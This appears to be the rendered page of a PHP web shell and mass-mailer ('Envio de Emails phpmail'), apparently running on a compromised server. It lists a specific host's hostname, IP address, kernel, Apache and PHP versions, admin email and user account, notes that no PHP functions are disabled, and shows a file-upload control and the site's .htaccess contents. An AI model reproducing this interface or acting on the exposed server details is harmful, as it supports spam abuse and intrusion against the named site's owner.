Envio de Emails phpmail

*Lembrete: texto em HTML *Separado por quebra de linha
Nome do Servidor: Linux gsoft-dev 5.14.0-598.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jul 8 16:37:49 UTC 2025 x86_64
Sistema Operacional: Linux
Endereço IP: 160.251.83.132
Software usado: Apache/2.4.62 (CentOS Stream) OpenSSL/3.5.1 SVN/1.14.1 Phusion_Passenger/6.0.27
Email admin: info@gsoft.co.jp
Safe Mode:
HEX
HEX
Server: Apache/2.4.62 (CentOS Stream) OpenSSL/3.5.1 SVN/1.14.1 Phusion_Passenger/6.0.27
System: Linux gsoft-dev 5.14.0-598.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Jul 8 16:37:49 UTC 2025 x86_64
User: ghd (1006)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/ghd/htdocs/.htaccess
<FilesMatch \.php$>
    SetHandler "proxy:fcgi://127.0.0.1:9000"
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
#RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>